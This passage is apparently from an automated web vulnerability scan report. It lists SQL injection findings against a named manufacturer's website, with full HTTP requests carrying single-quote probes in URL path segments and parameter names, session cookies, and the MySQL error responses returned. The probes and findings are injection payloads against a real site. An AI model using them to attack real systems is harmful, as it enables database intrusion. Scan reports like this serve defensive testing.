User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:10 GMT
Connection: Keep-Alive
Content-Length: 17965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ut
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /products/accessories/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:11 GMT
Connection: Keep-Alive
Content-Length: 19672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ut
...[SNIP]...

1.115. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/products/accessories/international/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products'/accessories/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:56 GMT
Connection: Keep-Alive
Content-Length: 27718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.116. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/products/accessories/international/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories'/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:59 GMT
Connection: Keep-Alive
Content-Length: 27996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.117. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.millerwelds.com
Path:	/products/accessories/international/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories/international'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:01 GMT
Connection: Keep-Alive
Content-Length: 27996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.118. http://www.millerwelds.com/products/accessories/international/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.millerwelds.com
Path:	/products/accessories/international/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /products/accessories/international/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,